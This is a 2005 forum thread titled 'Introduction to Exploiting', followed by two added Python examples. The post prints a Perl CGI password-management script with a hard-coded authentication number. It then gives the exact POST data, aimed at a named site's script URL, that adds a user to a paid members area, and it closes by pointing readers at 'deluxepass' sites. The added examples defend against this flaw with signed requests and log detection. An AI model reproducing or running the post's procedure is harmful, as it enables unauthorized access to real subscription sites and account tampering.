Introduction to Exploiting

This thread in the "Security Tutorials" forum was created by windose, 31 March 2005.

  1. 31 March 2005
    Hi all,

    This little introduction was written back then by Fl00da.

    Well, I'm "trying" to explain something here; it's damn hard, but I still want to try.
    It's of course better if you know the Perl language, then you have it muuuch easier.

    So here is a script:

    ibill.pl (admins change the name very often, e.g. ibillpm.cgi etc., but it isn't hard to brute-force)


    Code:
    #!/usr/bin/perl
    use Fcntl qw(:flock); # flock() constants; the script refers to them as $LOCK_EX / $LOCK_UN below
    $LOCK_EX = LOCK_EX;
    $LOCK_UN = LOCK_UN;

    #########################################################################
    # please replace "/path/to/file with your password
    # file and "nOtl0g1c9l" with your authentication code
    #
    $pwdfile = "/path/to/.htpasswd"; # your password file
    $authpwd = "46229"; # your authentication number
    #
    #########################################################################

    #get the environment varianbles
    $method = $ENV{"REQUEST_METHOD"};
    $type = $ENV{"CONTENT_TYPE"};

    #if the script was called with the GET method, then send error
    if($method eq "GET") {
    &send_error("Invalid form post!!!");
    exit;
    }

    # check for the POST method and the HTML form's MIME-type
    if($method ne "POST" || $type ne "application/x-www-form-urlencoded") {
    &send_error("Web authorization code must come from a Form\n");
    exit;
    }

    # read form data from standard input
    %input_values = &get_form_tuples;

    $authcode = &normalize_query($input_values{"authpwd"});
    if($authcode ne $authpwd){
    &send_error("501"); # authentication failed
    exit;
    }

    $reqtype = &normalize_query($input_values{"reqtype"});
    if(!($reqtype eq "add" || $reqtype eq "delete" || $reqtype eq "chgpwd")){
    &send_error("502"); # invalid request type
    exit;
    }
    $username = &normalize_query($input_values{"username"});
    $password = &normalize_query($input_values{"password"});

    %users = &read_pwd_file();

    # add a user
    if ($reqtype eq "add"){
    if(!&valid_username($username)){
    send_error("507"); #invalid username
    exit;
    }
    if(!&valid_password($password)){
    send_error("508"); #invalid password
    exit;
    }
    if ($users{$username} ne ""){
    &send_error("505"); # specified user already exists
    exit;
    }
    $users{$username}=crypt($password,&get_key());
    &write_pwd_file();
    &send_success("201");
    exit;
    }

    #delete a user
    if ($reqtype eq "delete"){
    if(!&valid_username($username)){
    send_error("507"); #invalid username
    exit;
    }
    if ($users{$username} eq ""){
    &send_error("506"); # specified user doesn't exist
    exit;
    }
    delete $users{$username};
    &write_pwd_file();
    &send_success("202");
    exit;
    }

    #change the password of a user
    if ($reqtype eq "chgpwd"){
    if(!&valid_username($username)){
    send_error("507"); #invalid username
    exit;
    }
    if(!&valid_password($password)){
    send_error("508"); #invalid password
    exit;
    }
    if ($users{$username} eq ""){
    &send_error("506");
    exit;
    }
    $users{$username}= crypt($password,&get_key());
    &write_pwd_file();
    &send_success("203");
    exit;
    }

    # read CONTENT_LENGTH bytes from the standard input and decode
    # the URL format input, breaking it into an associative array
    # of HTML variable names and their values.
    sub get_form_tuples
    {
    local ($i);
    read(STDIN,$input,$ENV{'CONTENT_LENGTH'});
    @form_names = split('&',$input);
    foreach $i(@form_names) {
    ($html_name,$html_value) = split('=',$i,2); # limit to 2 fields so a value containing '=' is not truncated
    $input_values{$html_name} = $html_value;
    }
    return %input_values;
    }

    # URL syntax converts most non-alphanumeric characters into a
    # percentage sign, followed by the character's value in hex.
    sub normalize_query {
    local($value) = @_;
    $value =~ tr/+/ /;
    $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C",hex($1))/eg;
    return $value;
    }

    # Send error messages
    sub send_error
    {
    print "Content-type: text/plain\n\n";
    print "@_\n"
    }

    # Send success messages
    sub send_success
    {
    print "Content-type: text/plain\n\n";
    print "@_\n"
    }

    # read the password file and create an associative array
    sub read_pwd_file
    {
    if($pwdfile eq ""){
    &send_error("503"); #failed to locate the password file
    exit;
    }
    #open password file
    unless(open(PWD,$pwdfile)){
    &send_error("504"); #failed to open the password file
    exit;
    }
    flock(PWD,$LOCK_EX);
    seek(PWD,0,0);
    while(<PWD>){
    if (index($_,":") >= 0){
    ($cuser,$cpwd) = split(':',$_);
    chop($cpwd);
    if($users{$cuser} ne ""){
    &send_error("Duplicate user '" . $cuser . "' found\n");
    exit;
    }
    $users{$cuser}=$cpwd;
    }
    }
    flock(PWD,$LOCK_UN); # unlock and close the handle that was actually opened (PWD, not CFG)
    close(PWD);

    return %users;
    }

    # write the associative array to password file
    sub write_pwd_file
    {
    if($pwdfile eq ""){
    &send_error("503"); #failed to locate the password file
    exit;
    }
    #open password file
    unless(open(PWD,">" . $pwdfile)){
    &send_error("504"); #failed to open the password file
    exit;
    }
    flock(PWD,$LOCK_EX);
    seek(PWD,0,0);
    foreach $user (keys %users){
    $temp = $temp . $user . " :: " . $users{$user} . "\n";
    print PWD $user . ":" . $users{$user} . "\n";
    }
    flock(PWD,$LOCK_UN);
    close(PWD);
    }

    # generates a random salt for crypt function
    sub get_key
    {
    $chars[0] = chr(65+int(rand(26)));
    $chars[1] = chr(97+int(rand(26)));
    $chars[2] = chr(48+int(rand(9)));

    $key = $chars[int(rand(3))] . $chars[int(rand(3))];

    return $key;
    }

    # returns 0 if the 'username' is not a valid one. otherwise
    # returns 1
    sub valid_username()
    {
    local($usr)=@_;
    local($res)=1;

    if(length($usr) < 3){
    $res=0;
    }
    if($usr =~ /\s/) {
    $res=0;
    }
    if($usr =~ /\W/){
    $res=0;
    }
    return $res;
    }

    # returns 0 if the 'password' is not a valid one. otherwise
    # returns 1
    sub valid_password()
    {
    local($pwd)=@_;
    local($res)=1;

    if(length($pwd) < 3){
    $res=0;
    }
    if($pwd =~ /\s/) {
    $res=0;
    }
    return $res;
    }




    What do we do now?
    We open AD, go to "Extra Tools" and then to "Http Debugger"
    type into HTTP address: http://www.britishnylons.com/cgi-bin/ibillpm.pl

    On the right (Mode) click on "POST", then "Use Proxys", and at the very bottom activate "Post DATA",
    and enter this there:
    authpwd=46229&reqtype=add&username=RAIDRUSHCREW&password=RULEZ

    then press "connect", and we can already enter the members zone with
    RAIDRUSHCREW:RULEZ

    How did I manage to find the post data? I'll explain that briefly now.

    Let's take a look at the script:



    $authcode = &normalize_query($input_values{"authpwd"}); <- authpwd, the password comes first
    if($authcode ne $authpwd){
    &send_error("501"); # authentication failed
    exit;
    }

    then



    $reqtype = &normalize_query($input_values{"reqtype"}); <- the command,
    if(!($reqtype eq "add" || $reqtype eq "delete" || $reqtype eq "chgpwd")){ <- add or delete or chgpwd (change password)
    &send_error("502"); # invalid request type
    exit;
    }

    and at the very end:

    $username = &normalize_query($input_values{"username"}); <- username is clear
    $password = &normalize_query($input_values{"password"}); <- and the password

    PS: Everything that was inside "" we write into the post data

    at the very top we find the admin's password:

    $authpwd = "46229";

    That's it
    regards

    die dose

    PS: What do you need something like this for? E.g. your beloved deluxepass`es.............
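The weakness the post walks through is that the script's only "authentication" is a constant number stored in the script source, so anyone who learns it can add, delete or re-password users from anywhere. The following is an added example, not code from the post or from the ibill script: it decodes a form body the same way the script's get_form_tuples and normalize_query do, shows the legacy check accepting any request that carries the static number, and puts a hardened check beside it that requires an allowlisted source address, a fresh timestamp and an HMAC-SHA256 signature. HMAC_SECRET, PROVIDER_ALLOWLIST, MAX_SKEW_SECONDS and the sample request body are constructed assumptions for the example.

```python
import hashlib
import hmac
import time
from urllib.parse import unquote_plus

# The static "authentication number" exactly as the script on this page carries it.
LEGACY_AUTHPWD = "46229"

# Hypothetical per-deployment secret shared only with the billing provider.
# A real deployment would load it from the environment or a file outside the
# web root, never from a value hard-coded next to the handler.
HMAC_SECRET = b"example-shared-secret-not-a-real-key"

# Hypothetical allowlist of the provider's source addresses (RFC 5737 range).
PROVIDER_ALLOWLIST = {"192.0.2.10"}

# How far a request timestamp may lie from the server clock before it is a replay.
MAX_SKEW_SECONDS = 300


def get_form_tuples(body):
    """Decode application/x-www-form-urlencoded the way the script's get_form_tuples
    and normalize_query do: split on '&', then on the first '=', map '+' to space and
    %XX to the byte it encodes. A value that itself contains '=' survives intact."""
    values = {}
    for pair in body.split("&"):
        if not pair:
            continue
        name, _, value = pair.partition("=")
        values[unquote_plus(name)] = unquote_plus(value)
    return values


def legacy_check(form):
    """The script's authentication: whoever sends the static number is trusted.
    The number is constant and lives in the script source, so it is a shared
    default, not a credential."""
    return form.get("authpwd") == LEGACY_AUTHPWD


def sign(body, ts, secret=HMAC_SECRET):
    """Signature the provider would attach: HMAC-SHA256 over timestamp and raw body."""
    return hmac.new(secret, f"{ts}\n{body}".encode(), hashlib.sha256).hexdigest()


def hardened_check(body, ts, sig, remote_addr, now=None):
    """Accept only a request from an allowlisted source that is fresh and carries a
    valid signature. Returns (accepted, reason)."""
    now = int(time.time()) if now is None else now
    if remote_addr not in PROVIDER_ALLOWLIST:
        return False, "source address not allowlisted"
    if abs(now - ts) > MAX_SKEW_SECONDS:
        return False, "timestamp outside window (replay or clock skew)"
    # Constant-time comparison so the check does not leak how many bytes matched.
    if not hmac.compare_digest(sign(body, ts), sig):
        return False, "bad signature"
    return True, "ok"


if __name__ == "__main__":
    # Constructed body in the shape the post describes (authpwd, reqtype, username, password).
    body = "authpwd=46229&reqtype=add&username=newuser&password=example"
    print("legacy check accepts it:", legacy_check(get_form_tuples(body)))
    print("hardened, unsigned, unknown source:",
          hardened_check(body, 1000, "", "203.0.113.5", now=1000))
    print("hardened, signed by provider:",
          hardened_check(body, 1000, sign(body, 1000), "192.0.2.10", now=1000))
```

The signature binds the whole body, so changing reqtype or username after signing fails the check, and the timestamp window stops a captured request from being replayed later. The script's remaining weak spot, crypt() with a two-character salt for stored passwords, is a separate fix (a modern password hash) and is not covered here.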
     
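From the defender's side, the procedure above leaves a clear trace in the web server's access log: a GET against the user-management script (which the script rejects) followed by POSTs from an address that is not the billing provider. The following is an added example, not part of the post: it parses combined-log lines, flags GET probes and POSTs to the script from non-allowlisted sources, and counts POSTs per source, because the script answers a wrong authpwd with HTTP 200 and "501" in the body, so the status column alone never shows guessing. The log lines, PROVIDER_ALLOWLIST and BURST_THRESHOLD are constructed for the example.

```python
import re
from collections import Counter

# Apache/NCSA combined-log line: client, identd, user, [time], "request", status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Admins rename the script (ibill.pl, ibillpm.cgi, ...), so match the family loosely.
TARGET_RE = re.compile(r'/cgi-bin/[^/?]*ibill[^/?]*\.(?:pl|cgi)$')

# Hypothetical allowlist: the only source that should ever POST to the script.
PROVIDER_ALLOWLIST = {"192.0.2.10"}

# Every failed attempt is logged as status 200, so count POSTs per source instead.
BURST_THRESHOLD = 5

# Constructed sample log (RFC 5737 addresses), not taken from any real server.
SAMPLE_LOG = """\
192.0.2.10 - - [31/Mar/2005:10:00:01 +0200] "POST /cgi-bin/ibillpm.pl HTTP/1.0" 200 4
203.0.113.5 - - [31/Mar/2005:10:05:12 +0200] "GET /cgi-bin/ibillpm.pl HTTP/1.0" 200 19
203.0.113.5 - - [31/Mar/2005:10:05:40 +0200] "POST /cgi-bin/ibillpm.pl HTTP/1.0" 200 4
203.0.113.5 - - [31/Mar/2005:10:05:41 +0200] "POST /cgi-bin/ibillpm.pl HTTP/1.0" 200 4
203.0.113.5 - - [31/Mar/2005:10:05:41 +0200] "POST /cgi-bin/ibillpm.pl HTTP/1.0" 200 4
203.0.113.5 - - [31/Mar/2005:10:05:42 +0200] "POST /cgi-bin/ibillpm.pl HTTP/1.0" 200 4
203.0.113.5 - - [31/Mar/2005:10:05:43 +0200] "POST /cgi-bin/ibillpm.pl HTTP/1.0" 200 4
198.51.100.7 - - [31/Mar/2005:10:09:00 +0200] "GET /index.html HTTP/1.0" 200 1024
"""


def parse_line(line):
    """Return the named fields of one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def analyse(lines):
    """Return (ip, reason) findings for traffic to the user-management script."""
    findings = []
    posts_per_ip = Counter()
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        path = rec["path"].split("?", 1)[0]
        if not TARGET_RE.search(path):
            continue
        if rec["method"] == "GET":
            # The script rejects GET, so a GET is someone checking that the script exists.
            findings.append((rec["ip"], "GET probe of user-management script"))
        elif rec["method"] == "POST":
            posts_per_ip[rec["ip"]] += 1
            if rec["ip"] not in PROVIDER_ALLOWLIST:
                findings.append((rec["ip"], "POST from non-allowlisted source"))
    for ip, n in posts_per_ip.items():
        if n >= BURST_THRESHOLD:
            findings.append((ip, f"{n} POSTs in log: possible guessing of authpwd"))
    return findings


if __name__ == "__main__":
    for ip, reason in analyse(SAMPLE_LOG.splitlines()):
        print(ip, reason)
```

Run over a real log, the allowlist is the part to get right: the provider's addresses should come from its documentation, and the same list belongs in the web server configuration as an access restriction on the script, so the log check becomes a second line rather than the only one.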